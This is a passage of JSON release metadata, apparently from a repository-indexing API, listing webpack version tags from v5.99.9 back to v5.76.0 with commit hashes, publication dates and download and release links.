repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url"